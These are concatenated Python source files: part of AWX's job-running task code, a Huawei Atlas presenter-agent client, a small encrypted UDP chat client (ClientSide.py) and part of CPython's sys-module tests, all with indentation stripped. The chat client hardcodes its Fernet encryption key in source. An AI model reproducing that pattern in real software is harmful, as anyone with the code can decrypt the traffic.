with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task and self.task.instance.execution_environment:
ee = self.task.instance.execution_environment
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
presenter_agent.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# !/usr/bin/env python
# -*- coding:utf-8 -*-
import time
from threading import Thread
import sys
from atlas_utils.acl_logger import log_error, log_info
from atlas_utils.presenteragent.socket_client import AgentSocket
import atlas_utils.presenteragent.presenter_message as pm
import atlas_utils.presenteragent.presenter_datatype as datatype
class PresenterAgent(object):
"""Message proxy to presenter server"""
def __init__(self, server_ip, port):
self.socket = AgentSocket(server_ip, port)
self._closed = False
self.heart_beat_thread = None
def connect_server(self):
"""Connect presenter server"""
return self.socket.connect()
def start_heard_beat_thread(self):
"""Start thread that send heardbeat messages"""
self.heart_beat_thread = Thread(target=self._keep_alive)
self.heart_beat_thread.start()
def _keep_alive(self):
msg = pm.heartbeat_message()
while True:
if self._closed:
log_error("Heard beat thread exit")
break
self.socket.send_msg(msg)
time.sleep(2)
def exit(self):
"""Proxy exit"""
self.socket.close()
self._closed = True
def StartPresenterAgent(
msg_queue,
server_ip,
port,
open_status,
data_respone_counter):
"""Startup presenter agent"""
agent = PresenterAgent(server_ip, port)
ret = agent.connect_server()
if ret:
log_error("Connect server failed, ret =", ret)
return
open_status.value = datatype.STATUS_CONNECTED
while True:
data = msg_queue.get()
if data is None:
continue
if isinstance(data, datatype.FinishMsg):
log_info("Receive presenter agent exit notification, queue size ",
msg_queue.qsize())
time.sleep(0.1)
agent.exit()
break
agent.socket.send_msg(data)
msg_name, msg_body = agent.socket.recv_msg()
if (msg_name is None) or (msg_body is None):
log_error("Recv invalid message, message name ", msg_name)
continue
if ((open_status.value == datatype.STATUS_CONNECTED) and
pm.is_open_channel_response(msg_name)):
log_info("Received open channel respone")
open_status.value = datatype.STATUS_OPENED
agent.start_heard_beat_thread()
log_info(
"presenter agent change connect_status to ",
open_status.value)
if ((open_status.value == datatype.STATUS_OPENED) and
pm.is_image_frame_response(msg_name)):
data_respone_counter.value += 1
#log_info("send ok ", data_respone_counter.value)
|
ClientSide.py | # EXECUTAR COM PYCHARM PARA VER OS NOMES COLORIDOS
import socket
import threading
from time import sleep
from random import randint
from cryptography.fernet import Fernet
# CMD Command: pip install cryptography
# Linux Terminal/MACOS: pip3 install cryptography
def crypto_tolls():
key = b'n05rzNJNF-tU4H-oCneuEdDxR4_fCL_wAgsy9CmB7Jk='
fernet = Fernet(key)
return fernet
def getIP():
hostname = socket.gethostname()
ip_address = socket.gethostbyname(hostname) # IPv4
return ip_address
def format(msg):
return name + msg
def reciveMsg():
global kill_bool
while True:
msgBytes, serverIP = client.recvfrom(BUFFSIZE)
decryptedmsg = crypto.decrypt(msgBytes).decode(character)
print(decryptedmsg)
if kill_bool:
break
def clientSide(address):
global cont, kill_var, kill_bool, name
while True:
if cont == 0:
name = input("Name: ")
name = f'\033[1;3{randint(1, 6)}m{name}: \033[m'
msg = f'\033[1;36m>>ENTROU \033[m'
token = '0'
else:
sleep(0.0001) # Sincronizar
msg = input()
token = '1'
if msg == kill_var:
msg = f'\033[1;31m>>USUÁRIO SE DESCONECTOU \033[m'
kill_bool = True
token = '2'
decryptedmsg = format(msg)
encryptedmsg = crypto.encrypt(decryptedmsg.encode(character)) # Mensagem criptografada
msgsend = encryptedmsg + token.encode(character)
client.sendto(msgsend, address)
cont += 1
if kill_bool:
break
name = ''
cont = 0
kill_var = '/exit' # Encerramento
kill_bool = False
BUFFSIZE = 16384 # = 2^14
HOST = getIP() # IPv4
PORT = 12000 # Porta desejada
ADDR = (HOST, PORT) # Tupla IP/Porta
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
character = "utf-8"
crypto = crypto_tolls() # Ferramentas de criptografia
ClientSideThread = threading.Thread(target=clientSide, args=(ADDR,))
ClientReciveThread = threading.Thread(target=reciveMsg)
ClientSideThread.start()
while True:
if cont != 0:
ClientReciveThread.start()
break
ClientSideThread.join()
|
test_sys.py | from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
